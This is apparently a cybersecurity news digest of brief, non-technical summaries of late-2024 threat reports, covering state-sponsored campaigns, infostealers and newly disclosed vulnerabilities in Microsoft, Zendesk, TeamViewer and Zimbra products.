Summary:

In a recent cyber campaign, the Chinese state-sponsored threat group TAG-112 compromised two Tibetan websites to deliver Cobalt Strike malware. The attackers embedded malicious JavaScript that spoofed a TLS certificate error, tricking visitors into downloading a disguised security certificate. This incident highlights ongoing cyber-espionage efforts targeting Tibetan entities, linking TAG-112’s infrastructure to other Chinese operations.…
Read More

Summary: Microsoft’s November 2024 Patch Tuesday addresses 91 vulnerabilities, including four critical zero-days, two of which are actively exploited. The updates include fixes for various types of flaws, such as remote code execution and elevation of privilege vulnerabilities.

Threat Actor: Unknown | unknown Victim: Microsoft | Microsoft

Key Point :

Four zero-day vulnerabilities were disclosed, two of which were actively exploited in attacks.…
Read More

Threat Actor: Unknown | Unknown Victim: Microsoft | Microsoft Price: N/A Exfiltrated Data Type: NTLMv2 hash, Remote Code Execution capabilities

Key Points :

Microsoft Patch Tuesday for November 2024 fixed 89 vulnerabilities across various products. Two zero-day vulnerabilities, CVE-2024-43451 and CVE-2024-49039, were actively exploited at the time of release.…
Read More

Summary: A new Rust-based malware named Fickle Stealer has emerged, targeting sensitive information from compromised systems through deceptive tactics and multiple attack vectors. It employs advanced evasion techniques, masquerading as legitimate applications to avoid detection while siphoning data to attackers.

Threat Actor: Unknown | Fickle Stealer Victim: Individuals and organizations | Fickle Stealer victims

Key Point :

Fickle Stealer spreads through phishing, drive-by downloads, exploit kits, and social engineering.…
Read More

Summary: SentinelLabs has identified a new campaign dubbed ‘Hidden Risk’ by a suspected North Korean threat actor targeting cryptocurrency businesses with sophisticated multi-stage malware. This campaign employs phishing tactics and a novel persistence mechanism using the Zsh configuration file to maintain access to compromised systems.

Threat Actor: DPRK | BlueNoroff Victim: Cryptocurrency Businesses | cryptocurrency businesses

Key Point :

The ‘Hidden Risk’ campaign utilizes phishing emails with fake cryptocurrency news to deliver malware disguised as PDF files.…
Read More

Summary:

Fickle Stealer is a newly identified Rust-based information stealer that spreads through various attack vectors such as phishing and exploit kits. It effectively bypasses security measures like User Account Control (UAC) and is capable of stealing sensitive information, including passwords and cryptocurrency wallet details. The malware employs advanced obfuscation techniques to evade detection, making it a significant threat to compromised systems.…
Read More

Summary: A new Windows Themes zero-day vulnerability allows attackers to remotely steal NTLM credentials, prompting the release of free unofficial patches by ACROS Security. This vulnerability exploits how Windows handles theme files, potentially exposing user credentials without any user interaction.

Threat Actor: Unknown | unknown Victim: Windows Users | Windows Users

Key Point :

The vulnerability allows attackers to exploit NTLM credentials through malicious theme files viewed in Windows Explorer.…
Read More

Summary: A critical vulnerability in the BattlEye anti-cheat system, identified by researcher timoxa565, allows attackers to exploit the authentication process, potentially leading to illegitimate account bans in various online games. This exploit, dubbed “BannleEye,” manipulates communication between the client and server libraries, enabling malicious actors to spoof legitimate game environments.…

Read More

Threat Actor: Cybercriminals | cybercriminals Victim: Individuals and Organizations | individuals and organizations Price: Potential loss of $50,000+ Exfiltrated Data Type: Personal and financial information

Key Points :

Phishing emails are common attack methods used by cybercriminals to deceive recipients. Attackers often impersonate trusted organizations to manipulate victims into sharing sensitive information.…
Read More

Short Summary:

The article discusses the analysis of a packed Snake Keylogger malware sample. It details the reverse engineering process, including unpacking techniques, the use of .NET obfuscation, and the malware’s capabilities such as keylogging and clipboard hijacking. The analysis also highlights the malware’s communication with the threat actor’s Telegram bot and the extraction of various indicators of compromise (IOCs).…

Read More

Summary: A serious vulnerability in Zendesk’s email management system, identified as CVE-2024-49193, exposes companies to email spoofing attacks that can compromise sensitive support ticket histories. Despite initial dismissals from Zendesk, the flaw has prompted urgent action from affected companies to mitigate risks.

Threat Actor: Unknown | unknown Victim: Zendesk Users | Zendesk

Key Point :

The vulnerability allows attackers to spoof emails and gain unauthorized access to sensitive ticket histories.…
Read More

Summary: Microsoft has released patches for two actively exploited zero-day vulnerabilities and three additional publicly disclosed vulnerabilities in its latest Patch Tuesday update. The vulnerabilities pose significant risks to organizations, particularly those using Windows-based systems for administrative tasks.

Threat Actor: Various | threat actor Victim: Organizations using Windows systems | organizations using Windows systems

Key Point :

CVE-2024-43572 is a remote code execution vulnerability with a CVSS score of 7.8, posing a considerable risk to millions of endpoints.…
Read More
Short Summary

This article investigates a cybercriminal’s exposed server that contained various malicious tools, including DDoS scripts, SpyNote spyware disguised as popular apps, phishing pages targeting cryptocurrency companies, and ransom notes suggesting ransomware delivery. The findings provide insights into the tactics and strategies employed by cybercriminals to exploit unsuspecting networks.…

Read More

Summary: Security researcher Peter Gabaldon disclosed critical vulnerabilities in TeamViewer, enabling local privilege escalation attacks on Windows systems. The flaws, CVE-2024-7479 and CVE-2024-7481, arise from improper cryptographic signature verification during driver installations, potentially allowing attackers to gain SYSTEM-level access.

Threat Actor: Unknown | unknown Victim: TeamViewer users | TeamViewer

Key Point :

Two vulnerabilities (CVE-2024-7479 and CVE-2024-7481) allow attackers to escalate privileges from USER to KERNEL by exploiting improper signature verification during driver installation.…
Read More

Summary: Cybersecurity researchers are alerting organizations about active exploitation attempts of a newly disclosed vulnerability, CVE-2024-45519, in Synacor’s Zimbra Collaboration software. The flaw allows unauthenticated attackers to execute arbitrary commands, prompting urgent patching recommendations from security experts.

Threat Actor: Unknown | unknown Victim: Synacor | Synacor

Key Point :

Exploitation attempts began shortly after the vulnerability was disclosed, indicating a rapid response from threat actors.…
Read More

Short Summary:

This article discusses a vishing attack that targeted a remote employee in the hospitality sector, leading to unauthorized access to the customer’s network. Darktrace’s anomaly-based threat detection successfully identified and mitigated the attack, preventing data loss and reinforcing the importance of robust security measures against social engineering tactics.…

Read More